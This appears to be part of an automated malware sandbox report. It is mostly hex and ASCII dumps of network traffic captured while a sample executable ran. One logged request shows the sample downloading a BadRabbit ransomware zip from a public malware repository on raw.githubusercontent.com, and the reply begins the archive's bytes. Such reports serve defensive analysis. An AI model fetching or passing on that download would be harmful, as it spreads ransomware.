                                                                                                                                                2022-09-29 12:51:18 UTC861INData Raw: 51 f8 42 3d ce 92 73 b6 78 ef 3d 07 56 1d 27 cc c3 ff 69 a2 4c 72 70 6d e1 0c 08 c2 59 90 0b 4a 3f ef ec 96 47 79 67 30 09 40 86 bf 75 b4 30 ab e1 8a 80 dc e3 6d d0 4a 83 86 a5 02 6f 99 d0 06 9b 3e 3f 65 7e aa 18 07 16 63 46 ed 17 bf e3 8f 63 4d e9 f8 7f d0 2f ab 63 e9 6f fa ae 83 db 1e 5e 34 10 d3 d0 2b 00 d7 db 1d 2a 75 54 1e 48 7c 46 51 2b 2d f3 c2 5e af ad e8 67 15 03 bc bc 2b 37 8f 0e dc 53 be 3b cf b4 98 50 f1 6e 15 dd ac 62 40 08 14 d1 f0 17 87 10 ef 29 0d e0 7b c8 4f 6c 07 e2 e9 8f f2 3a 17 26 f8 a8 07 3b 31 4b 1e 5b 7a a3 1c 0a 43 e7 ee 9d 26 64 aa 91 be 8e fd 0c a8 62 ef f4 37 5a 82 cd 4c 0c be 04 d8 42 98 89 84 8e d5 19 aa 5c 91 08 28 c2 00 51 c4 b8 e4 a2 08 15 28 75 9c d7 2c eb 63 6b cf 5b 69 83 6b df 25 73 17 5d 4a d4 b5 65 1b 64 71 db 63 5d
                                                                                                                                                Data Ascii: QB=sx=V'iLrpmYJ?Gyg0@u0mJo>?e~cFcM/co^4+*uTH|FQ+-^g+7S;Pnb@){Ol:&;1K[zC&db7ZLB\(Q(u,ck[ik%s]Jedqc]
                                                                                                                                                2022-09-29 12:51:18 UTC877INData Raw: a5 e1 6f 96 ed aa b5 bf 9c 3f 38 44 e2 f5 54 2b 86 bf df f1 8b e9 fe 25 0c c9 4d 1d 4a 26 2a 71 40 c8 ab 67 61 a6 06 b7 e6 5b 63 84 1b f9 5b 24 45 2f 67 cf eb 57 a8 65 00 71 c2 41 98 92 85 0f 5f 2a ca 3b b3 3d d8 95 04 c0 4c b6 5b bf 7d 79 b5 7d 30 9f ac 9b b3 a8 c5 28 e7 60 72 b5 9f a1 6c 54 66 e8 43 a0 4b 3a a5 53 0d 43 be ad 2e 9b e5 2d 26 91 d3 12 1c 20 78 c0 69 51 8c e5 99 f1 a7 31 a1 74 b2 d3 99 c3 67 32 1b bb 76 04 db 95 de 1f 45 db c2 e5 49 29 27 50 c2 a5 52 7f c9 b3 48 89 52 48 25 43 5e d7 f1 c8 c5 20 59 ac 89 8e 69 5d 65 ef a8 cb 3b 47 70 a5 7c 72 a9 4c 22 19 2b 56 ac 7f bc 20 7f 10 d9 56 36 3f 3c cb 7b 20 4a 05 bb 8a 5a 35 7b f6 2f ea fb 81 e3 c4 4a 7f 7c e8 d2 fc e0 16 dc f3 88 ef 48 67 5a 3a 31 df 61 78 53 a3 c7 dc 10 c7 1d d5 74 0c 03 a4 5c
                                                                                                                                                Data Ascii: o?8DT+%MJ&*q@ga[c[$E/gWeqA_*;=L[}y}0(`rlTfCK:SC.-& xiQ1tg2vEI)'PRHRH%C^ Yi]e;Gp|rL"+V V6?<{ JZ5{/J|HgZ:1axSt\
                                                                                                                                                2022-09-29 12:51:18 UTC893INData Raw: 31 2b c7 2c e9 a3 ad 6f 86 ba 30 a8 45 5c 7a 88 73 e3 75 34 7d 65 92 6c 20 9c 21 41 29 b1 1c 8e 7f e2 18 b0 26 34 9b 92 35 a1 78 d3 4e 02 9b 91 b0 f8 53 bb 7b 2b f0 40 03 25 b4 76 4c f0 90 a4 58 03 7d 39 e9 52 ed 6c 18 97 68 4d 67 f1 3d b6 d6 0f cf 3c 23 d2 58 4c 9c 0b 47 5d 5b ee fc 36 8c 70 ec 8a 4f 33 8a de c6 67 5c f8 3e f1 b5 2a aa 2c ee e4 66 58 80 58 95 37 86 77 cb 98 ee d3 70 76 3e 26 e6 cb 1f 5a 7e 55 4d b4 fd 5e 3f 0c a6 96 9e 3f 36 bd ad 6f 05 30 cb 76 fe 52 33 8c 47 8d ec 2f 4e 33 d4 2b b0 9c 5c 4b 31 a3 a1 70 0c 8c 3b 3e 24 02 30 6d 18 dc 81 a1 41 5f fd 3f 3d 2e 87 ba a5 b4 80 c3 b0 84 0f 18 c7 44 12 2b a2 fa c6 fc 03 55 ed db 7d a5 f2 81 cb 99 8d 54 de 68 7b 51 7f 69 d6 0c ec 0b 22 4c 2d d5 94 14 b0 90 1d 4c db 34 75 42 10 97 51 11 f8 76 19
                                                                                                                                                Data Ascii: 1+,o0E\zsu4}el !A)&45xNS{+@%vLX}9RlhMg=<#XLG][6pO3g\>*,fXX7wpv>&Z~UM^??6o0vR3G/N3+\K1p;>$0mA_?=.D+U}Th{Qi"L-L4uBQv
                                                                                                                                                2022-09-29 12:51:18 UTC909INData Raw: 5b 26 5f 81 12 55 a6 7b 89 e1 dc 68 9c bc ba 51 41 8e 2c 3f 68 71 ad 98 14 b4 78 e5 06 db 6d 3e cd 00 54 cf 86 55 bf 1b 61 8e 16 7c 74 3a 16 85 29 fa 32 05 f3 1e 34 fa c2 bc 73 c9 ff 2b be 2b c1 db c4 bd 51 05 20 9b 48 6e 95 86 63 8c 5a ad 0f 40 06 03 3e f1 42 fd f6 45 17 53 7f f4 a4 db 90 14 f5 cc a6 61 93 d5 1b 45 38 ad ea e6 33 2a 95 09 b2 bb 29 9d 86 1a 80 d9 45 b7 bf 45 e0 83 8b ab 1f c7 30 aa 46 a4 96 b5 0c b0 de 63 e9 77 2f 5e 63 a6 1a e0 08 01 24 d9 4b a9 41 b5 93 b0 e4 f4 76 38 17 ff 04 56 d2 d1 19 92 87 ee 3b c2 6b fa cf c2 a0 f5 bb 84 46 16 d0 6d 36 53 b6 b9 85 33 29 ee 17 98 c2 80 61 28 e5 0a ed 12 81 b9 59 95 16 df f5 ee 33 39 c2 34 c8 b0 cc 1f 69 c2 c7 62 71 9c 98 09 8b 4b f1 8f ee e3 bf 8b 1d 3b 0c e1 30 c7 04 19 b1 8f 8c 47 8b a2 06 a0 07
                                                                                                                                                Data Ascii: [&_U{hQA,?hqxm>TUa|t:)24s++Q HncZ@>BESaE83*)EE0Fcw/^c$KAv8V;kFm6S3)a(Y394ibqK;0G


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                70192.168.2.549773185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:52:40 UTC38056OUTGET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2022-09-29 12:52:40 UTC38056INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 402632
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "004f09a50a54351833511d1b99db3436b26a72d8e149d6c13dd20a27fe83f3a9"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 081E:1220:100920B:1104BA2:633592FF
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:52:40 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6957-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455961.788828,VS0,VE2
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 4d5c34d12b1a43223058a876352cfb15c86eba8b
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:57:40 GMT
                                                                                                                                                Source-Age: 172
                                                                                                                                                2022-09-29 12:52:40 UTC38057INData Raw: 50 4b 03 04 14 00 01 00 08 00 81 a9 58 4b a5 c9 a1 5f 12 24 06 00 2b be 06 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 61 64 52 61 62 62 69 74 2e 65 78 65 01 be e1 49 53 97 20 1c fa c3 6c 18 29 d1 f4 f7 b9 c1 0f c2 9d 6d e2 a3 7f 5f 80 37 a1 bf 46 53 1e 79 43 c5 68 f0 2d 6f a5 6c bc 0b d3 34 e8 37 46 4f 1d 09 b7 a5 d6 3f 8f 58 ab 3e 2a 6b e8 1c 51 80 2f 2b 06 5f 55 e5 78 40 db b9 ba f4 53 46 d8 d7 32 07 89 19 21 37 5e 46 a7 76 3d 2e 65 bc d2 d4 da f9 17 a2 91 f7 2a 17 53 56 14 07 fc 80 61 6e be 20 45 b9 a6 61 66 fa 0e e1 ab 52 4b 8f 7a 5f 56 4d 81 a4 45 ec fb 8c c3 9b b1 0c 2c 9f ac be 4e 92 81 00 98 1f 9a 78 44 7b 7e 07 bf be 1f 74 1e c3 72 cc ca b4 be 8c f1 ec 6f e7 14 34 c2 be ff d4 80 dc 69 5f 70 f5 e0 9e cf 53 02 80 3a 32 88 09 e4 9a 07 df 28
                                                                                                                                                Data Ascii: PKXK_$+Endermanch@BadRabbit.exeIS l)m_7FSyCh-ol47FO?X>*kQ/+_Ux@SF2!7^Fv=.e*SVan EafRKz_VME,NxD{~tro4i_pS:2(
                                                                                                                                                2022-09-29 12:52:40 UTC38058INData Raw: 34 32 65 b6 94 d6 82 b7 43 9e 4a 02 54 b5 35 79 77 8c f9 07 93 82 0a ea 8d ad c0 11 a4 0f c9 18 4d 97 d4 2b 21 fd 14 21 23 bb c3 75 54 09 b7 42 ea 85 01 a0 3e 79 a2 2a 6c 74 b8 19 55 58 7c 91 1c 9a 4b 1f bf c4 2c 5b 94 30 25 67 ea 17 e7 9e b7 9e 75 c0 e0 37 ec f1 7d 83 c9 2a 70 84 d9 f2 17 cd 1b 65 77 e8 15 a9 d6 30 27 03 62 99 43 e8 af e6 f3 37 3b bf 96 93 3e 56 12 2d ad 6a 24 17 4a 24 21 8c 72 90 22 84 ea 46 f9 7f d3 a4 2d 8a 96 aa f4 3b 8b d5 b9 52 93 63 91 ac 36 dd 22 be 4c bd 29 5a d5 f9 9c f2 54 df 96 38 c2 7a 8a a0 2a 54 3e bb 6b 33 fd d0 1a 52 f0 28 20 be 11 ea bd 23 a1 52 46 63 49 47 4c 46 fb 28 cd 1b 46 87 0a c7 dc 90 a8 f1 9d 8a b3 06 02 f8 29 7d 38 1a 36 15 ca 59 e4 4e aa 01 82 e1 63 5c 45 df 81 8e 9c d7 9b bd 14 cf e2 17 1d 97 e1 9b 99 0a c9
                                                                                                                                                Data Ascii: 42eCJT5ywM+!!#uTB>y*ltUX|K,[0%gu7}*pew0'bC7;>V-j$J$!r"F-;Rc6"L)ZT8z*T>k3R( #RFcIGLF(F)}86YNc\E
                                                                                                                                                2022-09-29 12:52:40 UTC38060INData Raw: 0b 4e ef f3 6f de 93 7d a5 05 18 9d 45 49 ba f1 95 0a fe e5 1d 2c 3d 8d 9f b6 af 61 be ce 82 20 42 80 de 04 34 af 26 76 84 d9 b0 cd f2 ef 7d dc a0 96 8b e3 64 a3 16 dc d4 c2 dc e9 ab b5 55 06 32 cb 4f f0 b4 5e 63 02 ef 09 6a 9e 96 33 60 33 fe 8c 2a bc 38 61 c9 78 94 53 07 08 47 c4 fa e8 e7 33 bb dd 26 2e f2 f0 de ea d4 a8 f2 f4 b0 0e ed 58 b1 cb a3 dd 1c 2f 51 36 d5 9a db 7a bf 9c 05 95 0a d7 98 b5 6d 98 39 11 bc 35 fb 73 2a 8b 65 75 c1 c8 3a 5d f9 e7 53 79 08 72 37 05 31 50 43 96 46 b9 84 fb 94 4c cb 59 bc ad a5 4d a9 d2 ff fe c9 5c b4 de 43 1f c9 8b 9b d6 95 3a eb f1 c6 ea 6c 5f 18 ee 12 3d 01 e2 ec f1 db ca 1b 3d 5e b4 9e c5 a5 b2 0e 85 46 13 d9 7a 88 59 bd 6d cc fd 87 63 e7 b7 26 93 d5 62 61 25 0e 88 c4 97 f9 43 93 cb 88 94 d0 ad 67 9c 3c 40 b5 cc 8c
                                                                                                                                                Data Ascii: No}EI,=a B4&v}dU2O^cj3`3*8axSG3&.X/Q6zm95s*eu:]Syr71PCFLYM\C:l_==^FzYmc&ba%Cg<@
                                                                                                                                                2022-09-29 12:52:40 UTC38061INData Raw: 8c 37 76 69 b4 a5 3e 45 27 e1 53 fb 7b 37 7b bc 8c 6b ab 81 72 b2 d9 c2 3e ea 9f 06 6d cb 02 98 fd c5 2f e6 6b 2c 3e 04 fd 0e a2 13 dc 90 47 67 94 9a 05 6a e2 72 51 6f 79 20 c0 af 9c b6 cd 7e 06 8b 75 f7 f4 5f 72 0e ce b1 55 7e ef e3 99 00 cd d7 da 5d fa 58 4d 5f 79 5b 28 fc 62 1c ae 59 81 43 d0 34 f7 eb e8 eb 32 6c 5e 27 c4 1c ec 02 9c 5d 5a 10 ac c5 8b e3 c2 79 46 de 52 af 04 f8 55 49 89 7e 4b 54 68 e0 6c b3 ac e5 2f c5 fd e2 ec 8d 51 c6 27 e4 30 fe cf 43 87 d9 ac c5 af da 94 77 e6 02 27 5c 83 72 37 b1 af a6 c4 fc 2b 13 dd 23 6b 9a 8d e2 a7 35 9c e2 05 29 79 32 af ba c8 bb b3 8c 60 1f 67 0c 24 c1 75 78 c6 4b 6e 11 4d ab 81 20 38 bd 91 9a fe c7 b9 bb 4a e2 be f0 aa 04 46 61 a9 e8 71 b6 b1 20 b9 a9 3c f3 51 26 1b 5c b0 ee 94 ff 86 61 b9 1d 6c 1b 50 cb 6f
                                                                                                                                                Data Ascii: 7vi>E'S{7{kr>m/k,>GgjrQoy ~u_rU~]XM_y[(bYC42l^']ZyFRUI~KThl/Q'0Cw'\r7+#k5)y2`g$uxKnM 8JFaq <Q&\alPo
                                                                                                                                                2022-09-29 12:52:40 UTC38062INData Raw: c1 16 b7 77 97 48 37 28 7a 7b d4 b9 6c c7 17 29 0c 64 76 e8 86 67 1b f2 0e 51 87 a1 b3 07 5a 7b d8 66 cf f5 9a 3c ee 5e 88 07 bf ab 11 17 56 af 41 fa cb e8 fd d3 67 2f 42 83 dc 48 c4 a3 e7 22 d8 94 07 a7 7b 82 18 9e a6 f4 9c 28 2e f6 c1 7b b4 4c 21 da 36 7e 55 de 0b bd 81 0f 22 ad b2 fb 83 1b 3d 13 18 e1 f4 93 25 51 71 61 38 cc 76 6f d4 02 e5 75 59 61 b9 0f cb 08 d6 b9 c4 a5 69 83 80 51 fe b9 dd 2e 06 b5 3b af 1e be 76 e4 e6 ca df 7f 59 5f d4 ea 9d 7a cc d7 40 c8 65 73 e6 62 c8 7a 26 98 7d 22 ec 19 8f e2 bb cb d6 2c c7 69 66 a8 dd eb 4a 81 8f 13 8a ce 05 37 02 a4 27 de a9 3f 24 41 39 93 f5 e8 aa b0 82 82 e3 4d 39 23 54 01 a3 b8 14 ee 64 b4 47 fa 13 fc 5d da e7 b7 59 0e 5b 26 9c fd 12 0d 9c 49 08 f2 f6 5d 75 96 da 33 49 c4 58 47 e6 a7 92 96 08 4e 79 4e 04
                                                                                                                                                Data Ascii: wH7(z{l)dvgQZ{f<^VAg/BH"{(.{L!6~U"=%Qqa8vouYaiQ.;vY_z@esbz&}",ifJ7'?$A9M9#TdG]Y[&I]u3IXGNyN
                                                                                                                                                2022-09-29 12:52:40 UTC38064INData Raw: 8b 07 5d 36 1d d5 87 3c 81 4d 8c 76 b4 d1 e6 fe aa 29 36 9b 5f 71 06 5c 95 d2 f1 29 d5 a3 57 eb cd 49 62 2b c8 bb 99 6f 11 f6 1c d8 c2 f0 5c 92 d4 79 70 43 ec 43 f1 1d 25 95 ee bc d8 d1 d0 62 34 d8 f3 03 91 a1 a8 28 43 dc aa 4c f2 88 9b cd ab fc c0 14 11 24 fd 32 33 f8 01 63 62 4b c1 dd ce 23 a7 84 9e 2c 6f db 41 43 cd 7c f5 43 9a 2b 49 29 72 df 5e 61 23 ca ab a6 04 f7 ab e5 2c fc 65 95 dd 78 ec 7d 25 c0 7e d4 16 50 79 3f 70 20 fb 66 92 72 95 ed 50 93 11 14 d8 c7 a0 ba 34 f0 38 2d 7a 5c d3 55 05 a5 74 f0 73 2a 08 1d 18 8c 8c 56 8d 98 41 a0 e8 9a 20 e9 f0 4b 34 3d d5 77 6a d2 95 7b 93 f8 37 46 5c a9 87 78 7c f1 64 9c d9 0e c3 c1 27 43 27 63 16 f1 03 bd e9 4b 17 69 56 12 9b 05 70 e8 62 80 66 23 f1 a1 7f d6 85 92 1c b5 d5 42 03 aa 02 96 41 16 3b e2 bd 96 fc
                                                                                                                                                Data Ascii: ]6<Mv)6_q\)WIb+o\ypCC%b4(CL$23cbK#,oAC|C+I)r^a#,ex}%~Py?p frP48-z\Uts*VA K4=wj{7F\x|d'C'cKiVpbf#BA;
                                                                                                                                                2022-09-29 12:52:40 UTC38065INData Raw: 7b 7a 68 e8 33 12 2c 15 40 2c 54 ec 79 9a 52 b7 2f d4 85 2e cc eb 09 9d 4a 52 ff d8 d3 3b c7 ed 0a f3 20 cd 8b a1 b2 65 0d dc dd fb 1a fc bd db 77 35 8c 9b b7 1d c2 13 15 9f 96 1b ea d9 09 de 75 fc d2 50 94 7c 83 52 c4 12 c2 80 bd 30 89 79 fb c8 f6 ca 6f 50 dc ae a5 ae 1b 07 7c 12 e7 e8 9b e9 ef d9 88 12 bb a0 b9 91 82 d0 60 5a ae 0d 7e 28 dd d8 f9 4d 97 ce f3 d6 e4 04 29 53 09 03 b7 54 8b e2 67 09 26 e3 17 06 e5 10 7b 2a 21 9a 55 02 a4 7a 30 f6 f7 c6 c7 42 18 58 78 cd 4d 47 fe 5d 88 7e 04 6c 1a 05 2b 5d 70 e1 b9 56 93 28 5e 28 c5 34 76 58 a9 87 31 02 51 53 c7 e9 e0 db b8 86 73 73 9b 36 86 ff 87 d7 3a 57 d3 73 e6 81 c4 5e 1c 19 3f 0b 6f 2b 36 ab 96 c5 de 84 40 0d 4e 68 68 a9 40 e4 a9 97 75 14 83 79 d2 31 a0 5d c4 67 ec 46 84 b5 d6 ac 45 92 08 ea 0e 0f 66
                                                                                                                                                Data Ascii: {zh3,@,TyR/.JR; ew5uP|R0yoP|`Z~(M)STg&{*!Uz0BXxMG]~l+]pV(^(4vX1QSss6:Ws^?o+6@Nhh@uy1]gFEf
                                                                                                                                                2022-09-29 12:52:40 UTC38066INData Raw: d0 2c 20 15 74 1f 26 b4 1e f0 69 f8 78 26 ad 42 87 4a 0f ad a9 6d b7 ab 50 c7 e4 11 d0 9f 9f 2d ce a4 97 74 b5 da a8 61 76 ab 27 1a 8a a6 d2 ea 68 d7 15 97 a7 d7 40 62 60 3d 07 a8 9a 34 4b a8 69 4c 45 2f 50 7c 98 e6 c0 b4 0b 56 00 d5 4b 0f 18 5b 92 27 38 31 31 ea 43 9e 9a 9a 29 88 9c cb 7e 87 5d 79 36 8c 96 7c c3 1c eb 26 13 a1 76 e9 87 f7 ca f1 58 46 22 94 f3 ad bd 29 87 93 af 16 6d 45 67 f5 fb b3 f0 47 28 70 e4 df 8f dd f1 1d 3c b4 77 8c f5 d5 82 8f 16 99 d8 d5 a6 1a 8b 00 23 84 50 66 c9 62 8b a1 7e 7c 6a 3f 8f 12 8c ed ce ab c4 5d b9 30 b4 e7 9e 38 1b 2a 01 b7 47 c9 a4 20 7f b2 be 91 d1 ad 5a ce ac e5 9c 4f c3 15 f7 66 dd 01 95 5e a0 d9 36 11 38 e1 5f 4b cd 59 16 41 e2 71 6a 4e 5f 25 14 75 50 d1 30 bc d5 2b 3f 10 75 c7 4b 21 70 eb 53 b0 21 fa e6 46 b9
                                                                                                                                                Data Ascii: , t&ix&BJmP-tav'h@b`=4KiLE/P|VK['811C)~]y6|&vXF")mEgG(p<w#Pfb~|j?]08*G ZOf^68_KYAqjN_%uP0+?uK!pS!F
                                                                                                                                                2022-09-29 12:52:40 UTC38068INData Raw: 38 23 b6 e1 9c b9 61 ba 53 89 fe 4d 8b c1 de 1d 7f c9 0f 04 9c 2c 7d 8d c7 18 a4 bd dc a5 be 45 62 9c f5 4f 28 6f 3c ff 87 3f 4b 87 45 de 4f 8f 1d fe bd 02 a8 12 63 0d e0 58 c7 43 ca a3 e0 46 16 d6 45 1b ab a7 94 ec e6 76 0f da 15 da 0a b4 f9 fb 2f 8a 85 c0 19 28 46 b3 52 30 21 5c 87 79 34 e7 9a d7 74 59 c8 02 66 7c 43 ad cb 7a 18 6d 67 30 3f 78 3b 58 71 30 e0 7f ff 9d 23 69 00 f1 39 47 e3 88 15 95 50 6f a7 0e 04 63 36 0b eb 22 60 ee f4 5a a2 f1 df b8 3a b1 ae 8b 96 98 2d af d1 d7 2e 1c 30 b1 26 8b 3f ee d5 0b cb f2 4f ff 60 e4 15 14 ae c1 9b b0 fa b1 05 63 74 df d1 03 9e 22 35 29 92 ae 26 48 49 2c 76 87 bc ab e5 18 c0 d1 dd c2 3a 96 6b 3b 7c a8 aa 8a cc e9 6d ce 54 fe 1d dc cf 6e 08 3a a6 b3 d0 1c 3c 21 ba 23 ca 81 e8 c9 f6 17 d3 4a 9f b4 5f 70 86 39 c8
                                                                                                                                                Data Ascii: 8#aSM,}EbO(o<?KEOcXCFEv/(FR0!\y4tYf|Czmg0?x;Xq0#i9GPoc6"`Z:-.0&?O`ct"5)&HI,v:k;|mTn:<!#J_p9
                                                                                                                                                2022-09-29 12:52:40 UTC38069INData Raw: 3d 0d 53 dd 1d dc 12 35 25 bc 25 53 c5 74 6f ac 4f 14 b9 e3 67 de da e3 c8 0a e4 83 0e 06 23 ed 40 0c bb fd 86 92 fe b8 df e6 5a 41 34 9c 2d f2 d2 0b ae a2 85 51 dd 6d 90 f6 2c 8f 9a 0f 04 eb cd 23 1f 97 f5 f1 4e 0f 63 45 4e f3 72 a5 0c 3f 7c 9c d7 5c d2 55 cf 97 5b 77 82 4b 04 60 62 28 62 87 1f ff e8 cb 2e 58 06 7a a1 5a 77 37 f0 68 6d 8b c6 41 3b b9 f0 da e9 7b 5e 5b da 76 28 69 bf b4 b9 a3 da 65 56 41 23 70 f8 05 4b b2 f4 42 18 3d 6f 74 a3 02 82 6c 84 bd 42 30 18 aa 6c 50 ff c3 23 a9 ad cd 50 b9 8b a7 b2 40 b3 c7 49 ee 17 0c e5 ef 59 3c 42 e1 28 23 68 f9 47 48 37 be 08 40 c3 7c 2a 87 a4 04 4b 71 9e 79 0b d8 a9 a9 1f 2f 56 d6 46 56 9f 6f aa 8e d0 ce 4b 1a dd 4c e9 6f 10 49 d7 bd ae 53 d5 70 94 f2 06 00 be 74 78 71 8d 4f 0b 5c 29 cb 33 94 14 e7 c7 b3 62
                                                                                                                                                Data Ascii: =S5%%StoOg#@ZA4-Qm,#NcENr?|\U[wK`b(b.XzZw7hmA;{^[v(ieVA#pKB=otlB0lP#P@IY<B(#hGH7@|*Kqy/VFVoKLoISptxqO\)3b
                                                                                                                                                2022-09-29 12:52:40 UTC38070INData Raw: 9a 4b ac 49 ab e2 1c 36 bb 0b e4 6e a6 23 ec 6c 14 5d 30 68 e1 d2 47 84 02 c0 39 aa dd 08 5e 3e 4b 4b 33 83 fa c1 c1 2c f5 98 d1 49 9e a7 97 91 53 62 32 af fb 6b b9 9a 99 d2 f9 8d 6e d1 9e 67 80 8b ce 7b d9 87 b8 c3 25 f9 99 a3 1a dd 4a da 04 d8 20 03 76 86 48 a1 8c bc cf ad 78 f5 c9 ca 93 a6 8a 77 25 9f 01 e3 40 24 b7 08 8e 30 68 e9 dd 84 fc 30 8a 67 b5 61 3f f6 e1 bf 21 48 0e 5e 0c 33 9d 54 17 d7 b1 25 27 29 32 38 10 3d 9f 6d 35 5d 30 d0 f6 0b 6d 1f 59 11 e5 69 03 ab c9 bb b9 cb 0f 45 0f 84 e6 35 3e 38 9b 49 d5 8f b3 76 81 39 ad 13 14 8d 84 f1 7e 49 c7 e0 34 01 4e 02 96 32 a8 30 26 53 3b d3 83 9f 5e c4 cc 5f 98 3a 3e 1e 22 2b 91 30 82 7a b6 8a 93 d5 3b 41 92 ed 16 0d ff e6 51 d3 dd 0f 3c 8b 14 86 6f 6e 28 41 a1 37 11 1d e0 8b 44 30 93 44 c5 82 3a 99 b7
                                                                                                                                                Data Ascii: KI6n#l]0hG9^>KK3,ISb2kng{%J vHxw%@$0h0ga?!H^3T%')28=m5]0mYiE5>8Iv9~I4N20&S;^_:>"+0z;AQ<on(A7D0D:
                                                                                                                                                2022-09-29 12:52:40 UTC38072INData Raw: ac 9c 8c 93 a9 2a c3 a4 30 fb 7f 88 81 83 37 66 5a c5 3a a1 59 e9 3d 3e 2d ea 91 8e ad 73 f6 ea 0c 61 50 8a 93 85 f5 57 fe 6d 84 af f0 af 77 f1 45 ec 3d 56 9e c1 72 4b 48 14 8b a4 39 8e 3d c4 ed 55 17 a3 c5 f2 00 3f 1c 21 9d 0c bd f3 4f bc 74 1c 22 7c 16 15 30 95 0a 4c f7 fa 91 9c ed a8 8b 10 b9 d8 ba f1 ba 67 fb 7c 5a b9 16 3f 5e 79 68 0f 3f 66 3e e6 02 37 d7 90 1e 51 3f cf 16 e3 f8 6c 3c 9f 1c ff 46 10 16 ef de 78 cf 1c b7 1a 3e 85 39 84 ea a6 36 ca 78 5c 33 42 a3 9b 60 b4 5f fd 1b 5e 42 1a 60 24 6f 54 41 6b ea a3 ef 63 7f 05 94 85 cc 3a 1d 75 a1 34 16 57 a5 dc d9 46 7b a5 b2 e2 4c db e3 07 19 cd e7 c7 6c 3e dd a2 29 89 de 79 d4 c8 a5 13 42 a4 fe e6 9a d0 d0 0c d1 16 9a 2c 61 45 49 d3 7a a0 0c 4e c5 3f fd 14 6f 37 49 fa bf 8e 6b 79 38 3b 60 aa d2 c3 55
                                                                                                                                                Data Ascii: *07fZ:Y=>-saPWmwE=VrKH9=U?!Ot"|0Lg|Z?^yh?f>7Q?l<Fx>96x\3B`_^B`$oTAkc:u4WF{Ll>)yB,aEIzN?o7Iky8;`U
                                                                                                                                                2022-09-29 12:52:40 UTC38072INData Raw: 08 57 09 89 3b 60 2f da 39 06 cc 7c 81 d8 a0 d4 b0 f0 13 a4 5e 5f 3d b2 31 1e f7 44 d5 ca 34 94 53 1d 74 b1 05 98 b5 1f a2 3c 71 c7 63 2d b3 cd 20 54 b3 f5 31 04 10 b3 6a d4 fd 5a e2 b4 8f 99 53 84 17 b9 17 94 68 c1 a0 a5 7a 9e a0 d2 ac ed 0d 0b 53 18 bd e7 3e 04 29 2f 6f ad 81 39 02 e2 fe b7 da 24 92 2f db b5 6c 27 f2 d8 61 76 12 c7 09 b5 8f fb e1 26 4a ad 5a 7d bb 1f ed eb a3 06 0d 31 4f 45 c2 a6 46 b3 b8 82 09 4d 90 43 76 f7 64 7a e0 b0 2f 35 9e 39 bd 9e 38 c8 e4 fc 17 68 62 2b 05 ae 8e d6 55 60 f3 41 26 ab 7c 39 ca 53 eb bb 59 4d 6f 68 f7 66 a5 0b 31 e2 9a 59 f7 d1 b6 3e 4d 9c a2 2c dd 28 ea 68 2c 62 32 80 32 17 3a 2e 9e 71 d5 8f 75 8a 0a 8d 2d 38 0c 4e 11 b6 20 c4 51 56 42 c4 02 ce 48 eb a5 75 01 0a 05 22 ce 17 e0 bc 1c a9 31 85 59 44 4a df 46 b8 a2
                                                                                                                                                Data Ascii: W;`/9|^_=1D4St<qc- T1jZShzS>)/o9$/l'av&JZ}1OEFMCvdz/598hb+U`A&|9SYMohf1Y>M,(h,b22:.qu-8N QVBHu"1YDJF
                                                                                                                                                2022-09-29 12:52:40 UTC38088INData Raw: a2 3a 2f bf c2 a3 8b 73 33 8d d1 5c bf b8 bf 30 eb 9e 89 a6 0a c9 5c a1 61 a8 37 dc d3 d3 73 29 a7 d8 09 01 2e 5c 25 cc e4 6c 6d a9 16 7e 50 07 f9 e6 d5 a3 68 cd 85 c8 29 dd 7d 46 ea 36 fb 71 fb d5 17 84 4a 13 9e 75 dc 24 22 93 96 d1 a3 41 33 95 3c d4 53 45 bf d2 36 69 79 b1 f8 b2 92 41 e6 80 9c 6f 1b 63 cc 39 07 af bb a5 ac cf 17 53 b8 50 da 6c d0 22 79 ad 16 ad 5d 6b c1 b8 ba c5 ee 0f 1e 12 00 74 8b f3 ac 63 dc 91 d9 56 48 7d 19 79 6b c8 8c 39 ad 3d 9d 75 f9 01 24 ca 39 f5 02 85 1a de 66 e0 31 9a 81 28 c9 6f 83 c2 6e fc 59 b0 8c 46 18 1c 3f bd b8 41 08 14 76 41 18 83 1c 8c c6 50 37 29 01 ec 92 de b4 87 07 6f f3 b8 1b 1d 05 81 b7 5e 21 58 5b 5c fb 6b 36 b5 0d 95 42 fb 6a 1f 6e d0 53 9f ee 1c 20 c5 e7 77 71 e1 90 26 ad aa ed 45 59 c2 34 bc 32 c3 58 22 50
                                                                                                                                                Data Ascii: :/s3\0\a7s).\%lm~Ph)}F6qJu$"A3<SE6iyAoc9SPl"y]ktcVH}yk9=u$9f1(onYF?AvAP7)o^!X[\k6BjnS wq&EY42X"P
